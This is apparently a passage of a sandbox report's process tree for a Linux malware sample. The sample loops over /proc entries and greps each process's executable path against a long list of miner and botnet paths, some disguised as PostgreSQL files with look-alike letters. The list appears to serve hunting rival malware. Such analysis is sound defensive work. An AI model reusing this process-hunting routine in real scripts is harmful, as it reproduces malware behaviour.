/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1024
-
-
/bin/lsls -latrh /proc/6462⤵PID:1027
-
-
/bin/grepgrep exe2⤵PID:1028
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1031
-
-
/bin/lsls -latrh /proc/6472⤵PID:1035
-
-
/bin/grepgrep exe2⤵PID:1036
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1038
-
-
/bin/lsls -latrh /proc/6512⤵PID:1040
-
-
/bin/grepgrep exe2⤵PID:1042
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1045
-
-
/bin/lsls -latrh /proc/6522⤵PID:1047
-
-
/bin/grepgrep exe2⤵PID:1048
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1052
-
-
/bin/grepgrep exe2⤵PID:1055
-
-
/bin/lsls -latrh /proc/6532⤵PID:1054
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1058
-
-
/bin/grepgrep exe2⤵PID:1062
-
-
/bin/lsls -latrh /proc/6542⤵PID:1061
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1064
-
-
/bin/grepgrep exe2⤵PID:1067
-
-
/bin/lsls -latrh /proc/6572⤵PID:1066
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1069
-
-
/bin/grepgrep exe2⤵PID:1072
-
-
/bin/lsls -latrh /proc/6622⤵PID:1071
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1074
-
-
/bin/lsls -latrh /proc/6682⤵PID:1076
-
-
/bin/grepgrep exe2⤵PID:1077
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1079
-
-
/bin/grepgrep exe2⤵PID:1082
-
-
/bin/lsls -latrh /proc/6752⤵PID:1081
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1084
-
-
/bin/grepgrep exe2⤵PID:1087
-
-
/bin/lsls -latrh /proc/6772⤵PID:1086
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1089
-
-
/bin/lsls -latrh /proc/72⤵PID:1091
-
-
/bin/grepgrep exe2⤵PID:1092
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1094
-
-
/bin/grepgrep exe2⤵PID:1097
-
-
/bin/lsls -latrh /proc/752⤵PID:1096
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1099
-
-
/bin/grepgrep exe2⤵PID:1102
-
-
/bin/lsls -latrh /proc/82⤵PID:1101
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1104
-
-
/bin/grepgrep exe2⤵PID:1107
-
-
/bin/lsls -latrh /proc/92⤵PID:1106
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1109
-
-
/bin/lsls -latrh /proc/962⤵PID:1111
-
-
/bin/grepgrep exe2⤵PID:1112
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1114
-
-
/bin/grepgrep exe2⤵PID:1117
-
-
/bin/lsls -latrh /proc/apm2⤵PID:1116
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1119
-
-
/bin/grepgrep exe2⤵PID:1122
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1121
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1124
-
-
/bin/grepgrep exe2⤵PID:1127
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1126
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1129
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1131
-
-
/bin/grepgrep exe2⤵PID:1132
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1134
-
-
/bin/grepgrep exe2⤵PID:1137
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1136
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1139
-
-
/bin/grepgrep exe2⤵PID:1142
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1141
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1144
-
-
/bin/grepgrep exe2⤵PID:1147
-
-
/bin/lsls -latrh /proc/cpu2⤵PID:1146
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1149
-
-
/bin/grepgrep exe2⤵PID:1152
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1151
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1154
-
-
/bin/grepgrep exe2⤵PID:1157
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1156
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1159
-
-
/bin/grepgrep exe2⤵PID:1162
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1161
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1164
-
-
/bin/grepgrep exe2⤵PID:1167
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1166
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1169
-
-
/bin/grepgrep exe2⤵PID:1172
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1171
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1174
-
-
/bin/grepgrep exe2⤵PID:1177
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1176
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1179
-
-
/bin/grepgrep exe2⤵PID:1182
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1181
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1184
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1186
-
-
/bin/grepgrep exe2⤵PID:1187
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1189
-
-
/bin/grepgrep exe2⤵PID:1192
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1191
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1194
-
-
/bin/lsls -latrh /proc/fs2⤵
- Reads runtime system information
PID:1196
-
-
/bin/grepgrep exe2⤵PID:1197
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1199
-
-
/bin/grepgrep exe2⤵PID:1202
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1201
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1204
-
-
/bin/grepgrep exe2⤵PID:1207
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1206
-
-
